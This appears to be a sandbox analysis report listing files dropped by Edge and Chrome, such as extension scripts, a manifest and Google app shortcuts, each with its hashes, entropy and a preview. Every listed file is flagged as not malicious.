                                                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3705)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):104595
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.385879258644142
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
                                                                                                                                                                                                                                                                                                                                MD5:4E0C47897BF98DEAC56F800942E150C4
                                                                                                                                                                                                                                                                                                                                SHA1:7903D30E0ACEE273724BDAA67446D9FD4E8460A5
                                                                                                                                                                                                                                                                                                                                SHA-256:FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
                                                                                                                                                                                                                                                                                                                                SHA-512:8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_845137876\19b9b5c3-fd45-4067-81f3-8e67fd75d1a9.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_845137876\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_845137876\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_845137876\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_845137876\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 20:02:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9747642877014195
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:8e81HoddQT90MbSWH1idAKZdA19ehwiZUklqehoxy+3:8j7PTzy
                                                                                                                                                                                                                                                                                                                                MD5:8D574B42621215324DFEA24181582649
                                                                                                                                                                                                                                                                                                                                SHA1:32E1BBEA125122B0F2537704BE9FE6C2FDB754CF
                                                                                                                                                                                                                                                                                                                                SHA-256:613A772968CDEB141259992523EF9EB2DB88ED4650F2EB66864527127504EE26
                                                                                                                                                                                                                                                                                                                                SHA-512:B3EE17C58EAFE6455AD6152BDB724DCA19EC3E6F60F58347969DCB0CA1C9ABAF445625B034EEC8718E085A4F1D8E2B809D272952238390F918557C80A8186EE9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,....+!..|)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\YD.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\YD.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\YD.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\YD............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\YE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 20:02:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9901370300150925
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:8C81HoddQT90MbSWH1idAKZdA1weh/iZUkAQkqehZxy+2:8/7Ph9QCy
                                                                                                                                                                                                                                                                                                                                MD5:F37961DE4E3145236E11A906126C153E
                                                                                                                                                                                                                                                                                                                                SHA1:8E765750F699D6E0558A3841F3EA61CF9250D9CE
                                                                                                                                                                                                                                                                                                                                SHA-256:2637D799BA79CB81146A0A528A0C0C3B8A4E00A623BC49204ED2E59EA115AF6B
                                                                                                                                                                                                                                                                                                                                SHA-512:7183271D1EF2FED0E368F3256F980C8128620CB8179D0153804E77669EA91BD73E6AD54C9B08283828EC51A455BCFC4DA6DB018483E12D513920AE986E29FA73
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.......|)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\YD.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\YD.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\YD.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\YD............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\YE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2693
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.001089674942786
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:8x+HoddQT90MbsH1idAKZdA14tseh7sFiZUkmgqeh7sXxy+BX:8xcPAn3y
                                                                                                                                                                                                                                                                                                                                MD5:D31E87B6D7E2AE3185AB0677F77E3737
                                                                                                                                                                                                                                                                                                                                SHA1:696115AECBE5991CF99FB3B043A4FD9B2D88FECC
                                                                                                                                                                                                                                                                                                                                SHA-256:04BDA368A71458C773C1D5555DF5B779638D16144B9F9D698264B801D158C5AB
                                                                                                                                                                                                                                                                                                                                SHA-512:F728A0CA233F826AD9C7F40403950E36E54B5D09E43AF4BF12FC5EF044EEA027B85721EC5774DB33458125FBECF535E236DE7AD664F17233D5DD519A501343D1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\YD.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\YD.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\YD.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\YD............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 20:02:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9882246185020924
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:8481HoddQT90MbSWH1idAKZdA1vehDiZUkwqehdxy+R:8x7PCpy
                                                                                                                                                                                                                                                                                                                                MD5:FAB02709B24FB3BC4C1C03F0D5CCF484
                                                                                                                                                                                                                                                                                                                                SHA1:2FD075BC37E4156293747B86B94D05C9D64AFD41
                                                                                                                                                                                                                                                                                                                                SHA-256:12A3CC799679DB92AA3E55FDB7967303BDD80BA08916366CC5FCBE0223525E9C
                                                                                                                                                                                                                                                                                                                                SHA-512:9A32D9202859DAF9B1C3D5E57BC6EA67618E6AD5A0D157C5ABE4FE0979106F62518523CD94E4EB926D13BA1A0A65E3BD8361833F3CCD1575EFB7438076230396
                                                                                                                                                                                                                                                                                                                                Malicious:false
